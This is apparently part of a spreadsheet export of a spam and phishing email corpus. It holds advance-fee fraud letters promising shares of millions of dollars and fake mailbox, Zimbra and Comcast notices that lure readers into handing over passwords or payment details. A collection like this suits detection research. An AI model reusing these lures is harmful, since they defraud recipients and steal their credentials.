relation to the deceased \nanindicated in our banking guidelines but unfortunately I learnt that all \nhis supposed next of kin or relation died alongside\nwith him at the planecrash leaving nobody behind for the claim.\n\nIt is therefore upon this discovery that I and other officials in my \ndepartment now decided to make businness proposal to you and release the \nmoney to you as the next of kin or relation to the deceased for\nsafety and subsequent disbursement since nobody is coming for it and I don?t \nwant this money to go into the Bank treasury as unclaimed Bill.\n\nThe Banking law and guideline here stipulates that if such money remained \nunclamed after five years, the money will be transfered into the Bank \ntreasury as unclaimed fund.\n\nThe request of foreigner as next of kin in this business is occasioned bythe \nfact that the customer was a foreigner and a Burkinabe cannot stand as next \nof kin to a foreigner.\nI agree that 30 % of this money will be for you as foreign partner, \ninrespect to the provision of a foreign account, 10 %will be set aside for \nexpenses incured during the business and 60 % would be for me . There after \nI will visit your country with my family for disbursement according to the \npercentages indicated.\n\nTherefore to enable the immediate trnansfer of this fund to you as arranged, \nyou must apply first to the bank as relations or next of kin of the deceased \nindicating your bank name, your bank account number,\nyour private telephone and fax number for easy and effective communication \nand location where in the money will be remitted .\n\nOn your acceptance, I will send to the text of application by fax or by \nemail which you are going to apply to the bank ; and provide materials \nconfirmation references and inquiries regarding payment formalities from the \npayment Agency. I willbe handling official\nprotocols here and expect you to undertake international responsibilities as \nI am assuring you of a risk free transaction provided you display maturity.\n\nTherefore, if you are willing and interested to render\nthe needed assistance, endeavor to reply through my\nemail address .\n\nThanking you in anticipation of your kind considerations.\n\nYours sincerely.\n\nMR. YSOUF AROUNA.\n\n_________________________________________________________________\nExpress yourself instantly with MSN Messenger! Download today it's FREE! \n[URL]http://messenger.msn.click-url.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>1332</t>
  </si>
  <si>
    <t>To: &lt;jose@monkey.org&gt;\nFrom: "Monkey.org--IT-" &lt;lms@littlelaureates.com&gt;\nDate: Wed, 21 Jul 2021 10:32:11 +0000</t>
  </si>
  <si>
    <t>Wed, 21 Jul 2021 10:32:11 +0000</t>
  </si>
  <si>
    <t>"Monkey.org--IT-" &lt;lms@littlelaureates.com&gt;</t>
  </si>
  <si>
    <t>&lt;jose@monkey.org&gt;</t>
  </si>
  <si>
    <t>Login Notice</t>
  </si>
  <si>
    <t>monkey.org server notification Email Verification Dear jose, To prevent your email jose@monkey.org from being shutdown, on 7/21/2021 You are required to use below to keep same password otherwise access to your mailbox will be denied. Keep Same Password [URL]https://dscollege.ac.in[/URL] © Connected to monkey.org Mail Server  2021 All rights reserved Login Notice  monkey.org server notification  Email VerificationDear jose,To prevent your email jose@monkey.org from being shutdown, on 7/21/2021You are required to use below to keep same password otherwise access to your mailbox will be denied. Keep Same Password © Connected to monkey.org Mail Server  2021 All rights reserved</t>
  </si>
  <si>
    <t>https://dscollege.ac.in</t>
  </si>
  <si>
    <t>819</t>
  </si>
  <si>
    <t>To: nan\nFrom: sessay massaquoe &lt;sessay1_7o2.pl@seeqmail.com&gt;\nDate: Wed, 21 Jul 2004 08:18:27 -0700</t>
  </si>
  <si>
    <t>Wed, 21 Jul 2004 08:18:27 -0700</t>
  </si>
  <si>
    <t>sessay massaquoe &lt;sessay1_7o2.pl@seeqmail.com&gt;</t>
  </si>
  <si>
    <t>A CRY FOR HELP.</t>
  </si>
  <si>
    <t>\nDEAR FRIEND,\n\n     GREETINGS TO YOU, WITH WARM HEART I OFFER MY FRIENDSHIP,AND\nGREETINGS, AND I HOPE THIS MAIL MEET YOU IN GOOD TIME.\n\nHOWEVER STRANGE OR SURPRISING THIS CONTACT MIGHT SEEM TO YOU AS WE HAVE\nNOT MET PERSONALLY OR HAD ANY DEALINGS IN THE PAST,I HUMBLY ASK THAT YOU\nTAKE DUE CONSIDERATION OF ITS IMPORTANT AND IMMENSE BENEFIT IT WILL TO\nYOU.\n\n    AFTER CAREFUL CONSIDERATION WITH MY WIFE ALONG WITH MY CHILDREN, WE\nRESOLVED TO CONTACT YOUR MOST NEEDED ASSISTANCE ON THIS MUTUALLY\nBENEFICIAL AND RISKFREE TRANSACTION WHICH I HOPE YOU WILL GIVE URGENT\nATTENTION. I DULY APOLOGIZE FOR INFRINGING ON YOUR PRIVACY, IF THIS\nCONTACT IS NOT ACCEPTABLE TO YOU, AS I MAKE THIS PROPOSAL TO YOU AS A\nPERSON INTEGRITY. FIRST AND FORMOST I WISH TO INTRODUCE MYSELF\nPROPERLY TO YOU.\n\nI AM MR.SESSAY MASSAQUOE  I AM MOVED TO WRITE YOU THIS LETTER ,THIS WAS IN\nCONFIDENCE CONSIDERING OUR PRESENT CIRCUMSTANCE AND SITUATION. I ESCAPED\nWITH MY WIFE AND CHILDREN  OUT OF SIERRA-LEONE TO GROU-JIRNSSUM,A VILLAGE\nIN THE NETHERLANDS THROUGH THE AID OF THE UNITED NATIONS EVACUATION TEAM\nWHERE WE ARE NOW PRESENTLY RESIDING  ON TEMPORARY POLITICAL ASYLUM.\n\nHOWEVER DUE TO THIS SITUATION I DECIDED TO CHANGE MOST OF MY BILLIONS OF\nDOLLARS DEPOSITED IN SWISS BANK AND OTHER COUNTRIES INTO OTHER FORMS OF\nMONEY CODED FOR SAFE PURPOSE BECAUSE THE NEW HEAD OF STATES  AHMED TEJAN\nKABBA MADE ARRANGEMENTS WITH THE SWISS GOVERNMENT AND OTHER EUROPEAN\nCOUNTRIES TO FREEZE ALL MY TREASURES DEPOSITED IN SOME EUROPEAN\nCOUNTRIES,HENCE I AND MY WIFE  ALONG WITH MY CHILDREN, DECIDED LAYING LOW\nIN THIS OUR TEMPOERY POLITICAL ASYLUM CAMP HERE IN GROU JIRNSSUM IN THE\nNETHERLANDS TO STUDY THE SITUATION TILL WHEN THINGS GETS ETTER,SINCE\nPRESIDENT TEJAN KABBA TAKING OVER GOVERNMENT AGAIN IN SIERRA-LEONE ONE OF\nMY  CHATEAUX IN SOUTHERN FRANCE WAS CONFISCATED BY THE FRENCH\nGOVERNMENT,AND AS SUCH WE HAD TO CHANGE OUR IDENTITY SO THAT OUR\nINVESTMENT WILL NOT BE TRACED AND CONFISCATED.\n\nI HAVE DEPOSITED THE SUM OF THIRTY MILLION,FIVE HUNDRED THOUSAND UNITED\nSTATES DOLLARS(US$30,500,000)WITH A SECURITY COMPANY FOR SAFEKEEPING.\n\nTHE FUNDS ARE SECURITY CODED TO PREVENT THEM FROM KNOWING THE ACTUAL\nCONTENTS. WHAT I WANT YOU TO DO NOW IS TO INDICATE YOUR INTEREST THAT YOU\nWILL ASSIST ME AND MY IMMEDIATE FAMILY BY RECEIVING THE MONEY ON OUR\nBEHALF.\n\nTHE ACCOUNT REQUIRED FOR THIS PROJECT CAN EITHER BE PERSONAL,COMPANY OR AN\nOFFSHORE ACCOUNT THAT YOU HAVE TOTAL CONTROL OVER,YOUR AREA OF\nSPECIALISATION WILL NOT BE A HINDERANCE TO THE SUCCESSFUL EXECUTION OF\nTHIS TRANSACTION.ACKOWLEDGE THIS MESSAGE,SO THAT I CAN INTRODUCE YOU TO MY\nFAMILY AS OUR FOREIGN TRUSTED PARTNER WHO SHALL TAKE CHARGE OF OUR\nINVESTMENT ABROAD WHERE WE NOW PLAN TO SETTLE.\n\nI WANT YOU TO ASSIST US IN INVESTING THIS MONEY,BUT I WILL NOT WANT OUR\nIDENTITY REVEALED.I WILL ALSO WANT TO BUY PROPERTIES AND STOCKS IN\nMULTI-NATIONAL COMPANIES AND TO ENGAGE IN OTHER SAFE AND NON SPECULATIVE\nINVESTMENTS.\n\nWE HAVE BEEN THROUGH A LOT OF HEALTH AND SPIRITUAL TURMOIL,HENCE WILL NEED\nYOUR UNDERSTANDING AND ASSISTANCE.\n\nMAY I AT THIS POINT EMPHASIZE THE HIGH LEVEL OF CONFIDENTIALLITY WHICH\nTHIS BUSINESS DEMANDS AND HOPE YOU WILL NOT BETRAY THE TRUST AND\nCONFIDENCE WHICH WE REPOSE IN YOU.I SHALL PUT YOU IN THE PICTURE OF THIS\nBUSINESS,I.E TELL YOU WHERE THE FUNDS ARE CURRENTLY BEING MAINTAINED AND\nALSO DISCUSS OTHER MODALITIES INCLUDING REMUNERATION FOR YOUR SERVICES.\n\nI SHALL INFORM YOU WITH  THE NEXT LINE OF ACTION AS SOON AS I RECEIVE YOUR\nPOSITIVE RESPONSE. IS THIS PROPOSITION ATTAINABLE?IF IT IS,PLEASE KINDLY\nFURNISH ME IMMEDIATELY BY E-MAIL WITH YOUR DIRECT TELEPHONE AND FAX\nNUMBERS TO ENHANCE THE CONFIDENTIALLITY WHICH THIS BUSINESS DEMANDS.\n\nBEST REGARDS\n\nMR.SESSAY MASSAQUOE.\n\nREPLY TO MY PRIVATE EMAIL ADDRESS...........&gt;sessay1_7@mail.gr\n                             ..........&gt;sessay1@di-ve.com\n\n\n********************************************************************\nSign Up For FREE Personalized Email Today! - [URL]http://www.SeeqMail.com[/URL]\n\n[URL]http://www.Grassroots.org[/URL] - Make Change!\n********************************************************************\n\n</t>
  </si>
  <si>
    <t>http://www.SeeqMail.com http://www.Grassroots.org</t>
  </si>
  <si>
    <t>560</t>
  </si>
  <si>
    <t>To: martinsaku01@truthmail.com\nFrom: Martins Aku &lt;martinsaku01@truthmail.com&gt;\nDate: Wed, 21 Jan 2004 13:02:32 -0500</t>
  </si>
  <si>
    <t>Wed, 21 Jan 2004 13:02:32 -0500</t>
  </si>
  <si>
    <t>Martins Aku &lt;martinsaku01@truthmail.com&gt;</t>
  </si>
  <si>
    <t>martinsaku01@truthmail.com</t>
  </si>
  <si>
    <t>Fund Management</t>
  </si>
  <si>
    <t>Attn: Dear Sir, \n\nREQUEST FOR YOUR ASSISTANCE IN A FINANCIAL TRANSACTION. \n\nI am interested in your partnership in business dealing.This business \nproposal I wish to intimate you with is of mutual benefit and it's success \nis entirely based on mutual trust,co-operation and a high level of \nconfidentiality as regards this business transaction. \n\nI am representing the board of the contract award and monitoring committee \nof the South African Ministry of Mining and Resources.I am seeking your \nassistance to enable me transfer the sum of US$20,000,000.00 (Twenty \nMillion United States Dollars) into your private or company account. \n\nThe funds came about as a result of a contract awarded and executed for \nand on behalf of my Ministry.The contract was supposed to be awarded to \ntwo foreign contractors to the tune of US$60,000,000.00 (Sixty Million \nUnited States Dollars).But in the course of negotiation between my board \nand the contractor to our benefit,the contract was awarded to a Bulgarian \ncontractor at the cost of US$40,000,000.00(Forty Million United States \nDollars).This contract has been satisfactorily executed and inspected as \nthe Bulgarian firm is presently securing payment from my Ministry,where \nour Board is in-charge of all foreign contract payment \napproval/disbursement. \n\nAs a civil servant still in active government service,I am forbidden by \nlaw to operate an account outside the shores of South Africa.Hence this \nmessage to you seeking your assistance so as to enable me present you or \nyour company as the second contractor of contractual claims alongside that \nof the Bulgarian contractor,to enable me transfer the difference of \nUS$20,000,000.00 (Twenty Million United States Dollars)into your provided \naccount. \n\nOn actualization,the funds will be shared as stated below. \n\n25% for you and 75% for us. \n\nWhat We request from you:- \n1)Your full names,company name if any(otherwise we will use your name to \nregister a company). \n\n2)Your address,tel,fax and cell phone numbers. \n\nAll logistics are in place and all modalities worked out for a smooth \nactualization of the transaction within the shortest possible time \nframe.For further details as to the workability of this transaction,please \nreach me as soon as possible for further clarification. \n\nThank you for your anticipated co-operation while I await your urgent \nresponse. \n\nYours Sincerely, \nMr James Radebe. \n\n\n\n\n\n---- Msg sent via TruthMail - [URL]http://WebBasedEmail.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://WebBasedEmail.com</t>
  </si>
  <si>
    <t>559</t>
  </si>
  <si>
    <t>To: nan\nFrom: s.shabangu2@freenet.de\nDate: Wed, 21 Jan 2004 06:19:21 +0100</t>
  </si>
  <si>
    <t>Wed, 21 Jan 2004 06:19:21 +0100</t>
  </si>
  <si>
    <t>s.shabangu2@freenet.de</t>
  </si>
  <si>
    <t>susan</t>
  </si>
  <si>
    <t>From: Mrs. Susan Shabangu. Greetings to you, With warm heart I offer my friendship, and greetings, and I hope this mail meets you in good time. However strange or surprising this contact might seem to you as we have not met personally or had any dealings in the past, I humbly ask that you take due consideration of its importance and the immense benefit it will be to you. After careful consideration with my children, we resolved to contact you for your most needed assistance in this manner. I duly apologize  for infringing on your privacy, if this contact is not acceptable to you, as I make this proposal to you as a person of integrity. First and foremost I wish to introduce myself properly to you. My name is Mrs. Susan Shabangu, mother of three and the Deputy Minister of Minerals and Energy  of The Republic of South Africa for seven years  running as you will find in the link  below: [URL]http://www.gov.za[/URL]  I will now give you a general overview of the situation. When I was sworn in as Deputy Minister of Minerals and Energy in 1996, with my influence, my husband Mr. Ndelebe Simon Shabangu a very successful businessman was awarded several contracts in my ministry and had direct dealings with foreign investors in this field. Due to my political status, I was not involved in my husbands business which was very vast and successful. My beloved husband died whilst on an official trip to Trinidad  and Tobago in February 2001. When my husband died, I was contacted as next of kin by a private security firm in Europe to come forth with the Certificate of Deposit and claim a safety deposit my husband has in their Vault in his name. At  that time, my children and I did not have an idea where the Certificate might be. We then instructed the security firm to continue holding the safety deposit until further instructions from me. Whilst preparing for the second remembrance of my beloved husband, I was going through his library collection and to my astonishment I discovered a Certificate  of Deposit for the safety deposit with this private security firm, and other documents relating to the safety deposit in a book. The safety deposit which is a trunk, is stocked with hard currency (US Dollars) totalling $10,000,000 which was generated from cash payments from his business associates in the diamond trade from Antwerp, Belgium. Though I knew my late husband was in the diamond business, I did not have the knowledge that he moved funds in cash. This has came as a shock to me and my children, and we have decided to have this fund invested immediately in commercial and residential properties abroad as well as profitable ventures, as any member of my family cannot hold such a huge amount in our name due to my political status, hence we sincerely propose to you to render us your most needed assistance in this regard. If you agree to render us your assistance, your role in this project will be to act on my behalf as a trustee to receive the safety deposit containing the funds from the Security firm. Though I believe this transaction should be based on mutuality, my family's interest will be protected by a family associate, who is a lawyer(attorney) attached to the South African Embassy in the country where the security firm is located. He is now aware of the safety deposit, and I have informed him that I am locating one of my husband's business associates (you) to handle the funds and invest on our behalf, as he might be opposed to our decision if he found out  that I barely know you. For your reliable assistance, we are offering you 20 % of the funds. I thank you in advance as we anticipate your assistance in enabling us achieve this goal. On hearing from you, I will forward your contact to the gentleman lawyer who will be representing us, and also give you his contact for both of you to communicate and proceed with the transaction.  He will be working with you for a mutual conclusion of the process and I look forward to a long lasting business relationship with you. As you may  understand, due to my sensitive position in the present government, it is not safe to communicate with me via phone or fax.  This is why I have communicated with you with my private email address, and I like us to keep this way, for the safety of this transaction. whether or not you are interested in assisting us  please let us know.This will enable us make  alternative plans, in the event of non-interest on your part. With warm regards, Mrs. S. Shabangu. --</t>
  </si>
  <si>
    <t>http://www.gov.za</t>
  </si>
  <si>
    <t>ZAF</t>
  </si>
  <si>
    <t>431</t>
  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: "Zimbra Alert"&lt;info@zimbra.com&gt;\nDate: Wed, 21 Dec 2016 00:41:54 +0100</t>
  </si>
  <si>
    <t>Wed, 21 Dec 2016 00:41:54 +0100</t>
  </si>
  <si>
    <t>"Zimbra Alert"&lt;info@zimbra.com&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Account Verification </t>
  </si>
  <si>
    <t>Dear   jose@monkey.org ,      Your Web mail Has Exceeded It Quota/Limit As Set By Your Administration, And You May Not Be Able To Send Or Receive New Mails Until You Re-Validate.   Click Here to Re-Validate your Account.  This Email is Subject to mandatory follow, Failure to comply would lead to Permanent closure of your account.   Regards, Zimbra Technical support team. --- This email has been checked for viruses by Avast antivirus software. [URL]https://www.avast.com[/URL] Dear   jose@monkey.org , Your Web mail Has Exceeded It Quota/Limit As Set By Your Administration, And You May Not Be Able To Send Or Receive New Mails Until You Re-Validate.  Click Here to Re-Validate your Account. This Email is Subject to mandatory follow, Failure to comply would lead to Permanent closure of your account.   Regards,Zimbra Technical support team. Virus-free. [URL]www.avast.com[/URL]</t>
  </si>
  <si>
    <t>4708</t>
  </si>
  <si>
    <t>To: &lt;yyyy@spamassassin.taint.org&gt;\nFrom: "TBA" &lt;tba@insurancemail.net&gt;\nDate: Wed, 20 Mar 2002 19:40:11 -0500</t>
  </si>
  <si>
    <t>Wed, 20 Mar 2002 19:40:11 -0500</t>
  </si>
  <si>
    <t>"TBA" &lt;tba@insurancemail.net&gt;</t>
  </si>
  <si>
    <t>Let the TBA Doctor Save Your Tough Cases</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_1EA50_01C1D02A.8CB39DF0 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: 7bit  Let the TBA Doctor Save Your Tough Cases! Healthy Clients need not apply! Sex	 Age	 Face Amt.	 Condition	 Other Co's	 TBA Female	 87	 $2,000,000	 High Blood Pressure	 Standard Preferred!	  Male	 60	 $500,000	 Aneurysm - Treated Surgically	 Decline Standard!	  Male	 57	 $1,000,000	 Heart Attack 1997 &amp; Pacemaker	 Table 6 Standard!	  Female	 57	 $500,000	 Diabetic for 34 years	 Table 4 Standard!	  Male	 51	 $1,500,000	 Alcohol Abuse (Dry 1 year)	 Decline Standard!	  Male	 50	 $2,500,000	 1/2 pack a day cigarette smoker Pref. Smoker	 Pref. Nonsmoker!	  Male	 47	 $2,000,000	 Tobacco Chewer	 Smoker	 Pref. Nonsmoker!	  Visit us at [URL]www.tba.com[/URL] or 800-624-4502x18   Please fill out the form below for more information	  Name:	  	 E-mail:	  	 Phone:	  	 City:	  	State:	  	  	  	 	   	 We don't want anybody to receive our mailings who does not wish to receive them. This is professional communication sent to insurance professionals. To be removed from this mailing list, DO NOT REPLY to this message. Instead, go here: [URL]http://www.InsuranceIQ.com[/URL]    ------=_NextPart_000_1EA50_01C1D02A.8CB39DF0 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Let the TBA Doctor Save Your Tough Cases =20      =20        =20           Sex Age Face Amt. Condition Other Co's TBA =20           Female 87 $2,000,000 High Blood Pressure Standard Preferred! =20           Male 60 $500,000 Aneurysm - Treated Surgically Decline Standard! =20           Male 57 $1,000,000 Heart Attack 1997 &amp; Pacemaker Table 6 Standard! =20           Female 57 $500,000 Diabetic for 34 years Table 4 Standard! =20           Male 51 $1,500,000 Alcohol Abuse (Dry 1 year) Decline Standard! =20           Male 50 $2,500,000 1/2 = pack a day cigarette smoker  Pref. Smoker Pref. Nonsmoker! =20           Male 47 $2,000,000 Tobacco Chewer Smoker Pref. Nonsmoker! =20             Please fill out the = form below for more information =20             Name:  =20                =20             E-mail:  =20                =20             Phone:  =20                =20             City:  =20                State:  =20                =20               =20                  =20                        We don't want anybody to receive our mailings who does not wish=20         to receive them. This is professional communication=20         sent to insurance professionals. To be removed from this mailing = list,=20         DO NOT REPLY to this message. Instead, go here: [URL]http://www.InsuranceIQ.com[/URL] out ------=_NextPart_000_1EA50_01C1D02A.8CB39DF0--</t>
  </si>
  <si>
    <t>www.tba.com http://www.InsuranceIQ.com http://www.InsuranceIQ.com</t>
  </si>
  <si>
    <t>3144</t>
  </si>
  <si>
    <t>To: overlobe@ozemail.com.au\nFrom: Jonathan Charles &lt;jonathancharles3@hotmail.com&gt;\nDate: Wed, 20 Jun 2007 19:52:39 +0200</t>
  </si>
  <si>
    <t>Wed, 20 Jun 2007 19:52:39 +0200</t>
  </si>
  <si>
    <t>Jonathan Charles &lt;jonathancharles3@hotmail.com&gt;</t>
  </si>
  <si>
    <t>overlobe@ozemail.com.au</t>
  </si>
  <si>
    <t>From JONATHAN</t>
  </si>
  <si>
    <t>\nDear Friend,  Permit the manner with which I am seeking your assistance but I am short of options and have no other choice. I am Jonathan Charles from the hospitality state ( Mississippi ), an army contractor attached to the US Military force in Iraq . The reason why I’m contacting you is to explain my findings to you and to seek for your assistance to enable you contributes immensely to the actualization of my dream.   \nI am attached to the US army for the sole purpose of reconstruction work in some parts of Iraq . As you know very well Iraq is gradually undergoing a rebuilding process in some parts and there is much need for reconstruction which was why I was invited. I evaluate the level of destruction and offer professional advice in line with the way they intend rebuilding and reconstructing damaged facilities. Work has been risky no doubt and challenging as sometimes we are faced hard on with armed insurgents where we lose some soldiers during confrontation. I have had my own share of losses as I lost a friend whom I have known for 12 years. On the 27th day of March 2007, at about 11:00 hrs during a normal inspection routine along Haifa Street where there is long rough high-rise buildings which were built and occupied by the late Saddam Hussein when he was alive, I with other 3 soldiers proceeded to a marked site and as I commenced evaluation work while I was closely guided by soldiers, I discovered an unusual bulge in a cellar which I presumed to be a storage room, I decided to have a look at it, only for me to kick the metal covering and find a metal boxes (5 in number) piled on top one another which were locked with a padlock each with a sign written in each of them.  Upon forcing the boxes open, we discovered several guns, amour and some boxes amongst which two contained guns and bullets, one filled with hard drugs (heroine) and the other two to my amazement contained some US Dollars and kilograms of alluvial Gold, which we counted and discovered that the money in one of the boxes amounted to $9.2 Million. I believe the boxes owned and linked to the Al Qaeda and Ayman al-Zawahiri. I however instructed them to keep this in high secrecy so that we can have the money and alluvial Gold to our selves, they all agreed to the plan of getting the money out of the country, but first we had to hide the money and alluvial Gold in some safe and untraceable location. We secretly kept the boxes in a safer place after which we handed over the drugs and the weapons to our superiors. \nI am now in desperate need of a “Reliable and Trustworthy” person like you who would receive, secure and protect these boxes containing the US Dollars and alluvial Gold for me until my assignment elapses here. We cannot afford to leave the boxes here in Iraq for any reason since Iraq is getting unsafe and dangerous everyday. We have no idea what could happen next as everything remains inconclusive at this point. I am fully aware of what your thoughts would be next, but on receiver of your response, I will send my picture as well as my Identity, for you to know whom you are dealing with. I assure and promise to give you 15% of this fund and some quantity of the alluvial Gold, please assure me of your keeping this topmost secret within you so that my job would not be jeopardized.  My Sincere Regards,Jonathan Charles.You can contact me with my private email: jonathancharles01@yahoo.co.in\n \n_________________________________________________________________\nNews, entertainment and everything you care about at Live.com. Get it now!\n[URL]http://www.live.com[/URL]</t>
  </si>
  <si>
    <t>http://www.live.com</t>
  </si>
  <si>
    <t>3143</t>
  </si>
  <si>
    <t>To: R@S\nFrom: MRS. LARISA SOSNITSKAYA &lt;larisasosnkayapofey@mail2russia.com&gt;\nDate: Wed, 20 Jun 2007 17:45:52 +0200</t>
  </si>
  <si>
    <t>Wed, 20 Jun 2007 17:45:52 +0200</t>
  </si>
  <si>
    <t>MRS. LARISA SOSNITSKAYA &lt;larisasosnkayapofey@mail2russia.com&gt;</t>
  </si>
  <si>
    <t>R@S</t>
  </si>
  <si>
    <t>A  BUSINESS PROPOSAL FROM RUSSIA</t>
  </si>
  <si>
    <t>\n\nDear Friend,\n\nI am Mrs. Larisa Sosnitskaya and I represent Mr. Mikhail Khordokovsky\nformer C.E.O of Yukos Oil Company in Russia. I have a very sensitive and\n\nconfidential brief from this top (oligarch) to ask for your partnership\n\nin re-profiling funds US$46 Million. I will give the details, but in\nsummary, the funds are coming via Bank in europe . This is a legitimate\n\ntransaction. You will be paid 20% as your \n\ncommison/compensation for your active efforts and contribution to the \nsuccess of this transaction\n\nIf you are interested, please write back through mail:\nlarisasnok@yahoo.ie\nPlease, a detailed and confidential Telephone number, Fax number and\nEmail address will be needed and I will provide further details and\ninstructions\nregarding the transaction.\nPlease keep this confidential, we can't afford more political problems.\n\nYou can read more of the story on This website below\n\nabout my boss.\n\n\n[URL]http://www.mbktrial.com[/URL]\n\n\n[URL]http://news.bbc.co.uk[/URL]\n\nPlease, advice me on your position by email immediately via:\nlarisasnok@yahoo.ie\ni look forward to seeing your mail.\n\nYour Sincerely,\n\nMrs. Larisa Sosnitskaya\n\n\n\n\n</t>
  </si>
  <si>
    <t>http://www.mbktrial.com http://news.bbc.co.uk</t>
  </si>
  <si>
    <t>3142</t>
  </si>
  <si>
    <t>To: nan\nFrom: pae.za@terra.es &lt;pae.za@terra.es&gt;\nDate: Wed, 20 Jun 2007 09:56:50 +0200</t>
  </si>
  <si>
    <t>Wed, 20 Jun 2007 09:56:50 +0200</t>
  </si>
  <si>
    <t>pae.za@terra.es &lt;pae.za@terra.es&gt;</t>
  </si>
  <si>
    <t>FROM: DAVID PEDRO.</t>
  </si>
  <si>
    <t>\n\n\n\n\n\n\n\n\nFROM: DAVID PEDRO.\nNO.1023 MATIMA STREET\nFREE STATE, SOUTH AFRICA\nTEL: +27.785709710\nEMAIL: davpe@myway.com\n\nATTENTION: DIRECTOR /CEO.\n\n\nSTRICTLY PRIVATE AND CONFIDENTIAL\n\nYou may be surprised to receive this letter from me since you don't know me\npersonally, the purpose of my introduction is that, I am MR.DAVID PEDRO ,the\nfirst SON of MR.MASIARA PEDRO, a member of commercial farmers union and leader movement for democratic change (MDC)in Zimbabwe who was murdered in the land dispute in Zimbabwe.\nI was furnished with viable information from the International Trade Centre\nhere in Johannesburg and I decided to write to you. Before the death of my\nfather, he had taken me to Johannesburg to deposit the sum of US$17 M(SEVENTEEN MILLION UNITED STATES DOLLARS),in a Security Company, as if he fore saw the looming danger in Zimbabwe.\n\nThis amount was meant for the purchase of new machines and chemicals for the\nfarms and the establishment of the new farms in Swaziland. This land problem\ncame when Zimbabwean President MR.ROBERT MUGABE introduced a new \nLand Act which wholly affected the rich white farmers and some few black farmers. This resulted to the killing and mob action by Zimbabwean war veterans and some lunatics in the society. Infact, a lot of people have been killed \nbecause of this land reformed Act for which my father was one of the victims.\nIt is against this background, that I and my family who are currently staying in South Africa decided to transfer my father's money to foreign account since the law of South Africa prohibit a refugee (asylum seeker) to open any bank account or to be involved in any financial transaction. As the eldest SON of my father, I am saddled with the responsibility of seeking a genuine foreign account where this money could be transferred without the knowledge of my government who are bent on taking everything we have got.\n\nI am faced with the dilemma of investing this amount of money in \nSouth Africa for fear of going through the same experience in future since \nboth countries have similar political history. Moreover, the South African \nForeign Exchange policy does not allow such investment as an asylum seeker. \nAs a business man, whom I have entrusted my future and of my family in his \nhands, I must let you know that this transaction is risk free. If you accept \nto assist me and my family. will aid us in transferring the money into any\naccount you will nominate overseas. This money I intend to use for investment. I have two options for you, firstly you can choose to have a certain percentage of the money for nominating your account for this transaction. Or you can go into \npartnership with me for the proper profitable investment of the money in your \ncountry. Which ever the option you want, feel free to notify me as I have \nalso mapped out 5% of this money for all kinds of expenses incurred in the \nprocess of this transaction. If you do not prefer a partnership I am willing to give you 20% of the money while the remaining 75% will be for my investment in your country. Contact me with the above telephone number while I \nImplore you to maintain the absolute secrecy required in this transaction. And no matter the level of transaction we are, you must call me on phone first before sending a reply. Please, you should keep this transaction secret and confidential. contact  me on this  mail direct  email:davpe@myway.com\n\nAnd send your fax and telephone numbers for easy communication/B.I would like you to furnish me with the following:\n1) YOUR PRIVATE PHONE AND FAX NUMBERS.\n2) YOUR FULL NAME.\n3) YOUR FULL ADDRESS.\nPLEASE YOU CAN READ ABOUT PROBLEMS IN ZIMBABWE AND HOW MY FATHER DIED, \nFROM THE LINKS BELOW.\n[URL]http://news.bbc.co.uk[/URL]\n[URL]http://news.bbc.co.uk[/URL]\n[URL]http://news.bbc.co.uk[/URL]\n[URL]http://news.bbc.co.uk[/URL]\n[URL]http://news.bbc.co.uk[/URL]\n[URL]http://news.bbc.co.uk[/URL]\nTHANKS FOR YOUR CO-OPERATION\nEMAIL: davpe@myway.com\nDAVID PEDRO (FOR THE FAMILY)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nAhora tambi&amp;eacute;n puedes acceder a tu correo Terra desde el m&amp;oacute;vil.\n\nInf&amp;oacute;rmate pinchando aqu&amp;iacute;.\n\n\n\n\n\n</t>
  </si>
  <si>
    <t>http://news.bbc.co.uk http://news.bbc.co.uk http://news.bbc.co.uk http://news.bbc.co.uk http://news.bbc.co.uk http://news.bbc.co.uk</t>
  </si>
  <si>
    <t>296</t>
  </si>
  <si>
    <t>To: nan\nFrom: "Comcast" &lt;kapil.yadav@cipla.com&gt;\nDate: Wed, 20 Jul 2016 09:45:46 +0530 (IST)</t>
  </si>
  <si>
    <t>Wed, 20 Jul 2016 09:45:46 +0530 (IST)</t>
  </si>
  <si>
    <t>"Comcast" &lt;kapil.yadav@cipla.com&gt;</t>
  </si>
  <si>
    <t>Comcast Customer Please Update Your Details</t>
  </si>
  <si>
    <t>Hello! Comcast Email users! This message is from the Comcast  High-Speed Internet informing Comcast users that there has been upgrade  of account and your payment motives has now changed. This is to alert  Comcast Users that you have to store your payment information with us so  as not to disable your account once the time is due for payment. We  have upgraded our system and therefore we are asking our customers to  fill their payment details on-line so as not to render their Comcast  Email account disabled. heniosifo: TO VERIFY/UPGRADE YOUR COMCAST EMAIL ACCOUNT? C LICK HERE! ([URL]http://www.emailmeform.com[/URL] "Disclaimer: Legally privileged confidential information, binding only if confirmed in writing by a person authorized by Cipla. Please notify sender immediately and permanently delete message if you are not intended recipient. This email is an informal communication and not a definitive opinion of the company or the author. Thoughts or ideas expressed here may be incomplete or in error and subject to further review and change. Thank you." Hello! Comcast Email users!This message is from the Comcast High-Speed Internet informing Comcast users that there has been upgrade  of account and your payment motives has now changed. This is to alert Comcast Users that you have to store your payment information with us so  as not to disable your account once the time is due for payment. We have upgraded our system and therefore we are asking our customers to fill their payment details on-line so as not to render their Comcast Email account disabled.                        heniosifo: TO VERIFY/UPGRADE YOUR COMCAST EMAIL ACCOUNT? C LICK HERE! "Legally privileged confidential information and subject to "Disclaimer".</t>
  </si>
  <si>
    <t>http://www.emailmeform.com</t>
  </si>
  <si>
    <t>295</t>
  </si>
  <si>
    <t>To: nan\nFrom: "Comcast" &lt;kapil.yadav@cipla.com&gt;\nDate: Wed, 20 Jul 2016 08:05:56 +0530 (IST)</t>
  </si>
  <si>
    <t>Wed, 20 Jul 2016 08:05:56 +0530 (IST)</t>
  </si>
  <si>
